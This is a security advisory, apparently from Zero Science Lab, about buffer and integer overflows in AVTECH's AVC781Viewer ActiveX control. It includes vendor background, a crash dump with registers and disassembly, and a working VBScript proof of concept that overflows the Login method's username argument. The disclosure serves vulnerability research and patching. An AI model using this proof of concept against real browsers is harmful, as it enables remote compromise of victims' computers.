Vendor: AVTECH Software, Inc.
Product Web Page: http://www.avtech.com
Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.
AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.
Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.
——————————————-
Exception Code: ACCESS_VIOLATION
Disasm: 10006C23 MOV [EAX],CL (AVC_AX_724_VIEWER.dll)
Seh Chain:
————————————————–
1 10022F68 AVC_AX_724_VIEWER.dll
2 FC2950 VBSCRIPT.dll
3 7C839AC0 KERNEL32.dll
Called From Returns To
————————————————–
AVC_AX_724_VIEWER.10006C23 AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508 AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0 8244C8B
Registers:
————————————————–
EIP 10006C23
EAX BAADF06D
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: ‘�$’�$
EDX 00182801 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC
Block Disassembly:
————————————————–
10006C12 MOV EAX,[EBP+144]
10006C18 ADD EAX,60
10006C1B JMP SHORT 10006C20
10006C1D LEA ECX,[ECX]
10006C20 MOV CL,[EDX]
10006C22 INC EDX
10006C23 MOV [EAX],CL <— CRASH
10006C25 INC EAX
10006C26 TEST CL,CL
10006C28 JNZ SHORT 10006C20
10006C2A MOV EAX,[ESP+20]
10006C2E ADD EAX,-10
10006C31 LEA ECX,[EAX+C]
10006C34 OR EDX,FFFFFFFF
10006C37 LOCK XADD [ECX],EDX
ArgDump:
————————————————–
EBP+8 00FE4658 -> 10044530 -> Asc: 0E0E
EBP+12 001862FC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 0018AB44 -> Uni: defaultV
EBP+20 00180A54 -> Uni: defaultV
EBP+24 00000001
EBP+28 00000001
Stack Dump:
————————————————–
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00 [............t...]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10 [....h...........]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00 [....t...........]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00 [\.............G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77 [XF..........DJ.w]
=============================================
=============================================
Proof Of Concept:
###############################
<object classid=’clsid:8214B72E-B0CD-466E-A44D-1D54D926038D’ id=’kungfuhustle’ />
<script language=’vbscript’>
targetFile = “C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll”
prototype = “Sub Login (
ByVal Username As String,
ByVal Password As String,
ByVal MediaType As String,
ByVal ConnectType As String
)”
memberName = “Login”
progid = “AVC781Viewer.CV781Object”
argCount = 4
arg1=String(1010, “A”)
arg2=”defaultV”
arg3=”defaultV”
arg4=”defaultV”
kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4
</script>
More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4934.php
